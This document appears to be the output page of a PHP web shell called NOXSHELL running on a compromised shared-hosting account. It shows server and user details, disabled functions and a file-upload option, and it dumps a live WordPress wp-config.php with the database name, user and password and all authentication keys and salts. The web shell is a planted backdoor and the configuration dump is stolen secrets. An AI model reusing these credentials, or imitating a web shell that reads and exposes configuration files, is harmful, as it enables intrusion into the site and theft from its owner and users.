NOXSHELL
Server: LiteSpeed
System: Linux br-asc-web1432.main-hosting.eu 5.14.0-611.16.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Dec 22 03:40:39 EST 2025 x86_64
User: u728655182 (728655182)
PHP: 8.1.33
Disabled: system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Upload Files
File: /home/u728655182/domains/felicettireal.com.ar/public_html/wp-config.php
<?php
define( 'WP_CACHE', true );
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * Localized language
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'u728655182_PMjpU' );

/** Database username */
define( 'DB_USER', 'u728655182_hnW7G' );

/** Database password */
define( 'DB_PASSWORD', 'MJgoaFcGLX' );

/** Database hostname */
define( 'DB_HOST', '127.0.0.1' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',          'Roay><|=O`a1_00-KxZK~/0XYo@lWrDUcMVv7F y;VY$Q+Y0`JUXja8D&I&dFiIz' );
define( 'SECURE_AUTH_KEY',   '`0WhN,nb>%4=AOsf<BG A_qtKW3(zHD!SG8*ZHKyy>9^g5pam+s`OIh9&o?J*- 8' );
define( 'LOGGED_IN_KEY',     'Z0Tg 60*__+A#/dt-ot8*;H=4CkBV2r7^G:a5@!Siq!g+pZpQHPtbW(]U)F<_Owi' );
define( 'NONCE_KEY',         'TT.pb6,g^Q/bkbMpS+h[{,{]fF=,, /;#TWN+ G&g[sH}[3*B{wZM~Ez54yS9A@M' );
define( 'AUTH_SALT',         'W){*m| Fvq?:6<DhkT~=vt?s`Jm>U5v-uQA.ke]iMy8# -In^=J>mLP=E}|b56,L' );
define( 'SECURE_AUTH_SALT',  'r[_{RwB.FL23+mvK^B?i#0T2U>I$cYOrl~Y*Tk:N_227X|z|@;pf{B_2f8kF~J(B' );
define( 'LOGGED_IN_SALT',    '<D(qLj<7_u.tu.gqY[pL9gf.1gozJC.|@]O<>3ytQ7EXItxJj&qTjcVa$[| >Pe=' );
define( 'NONCE_SALT',        ']t_D}G*>+mVF71`&bA7PX`>2IQ?OZSxCN}cu 1_G7x x(L&]TA*!f<3:OjoAhqrH' );
define( 'WP_CACHE_KEY_SALT', '[k)k!!`J5gy{WBP[vEz+]}+umHHSesvNnhKEB+_0LKT`qpo5[bgn^&R~-68lhQ5x' );


/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );


/* Add any custom values between this line and the "stop editing" line. */



define( 'FS_METHOD', 'direct' );
define( 'WP_AUTO_UPDATE_CORE', 'minor' );
/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';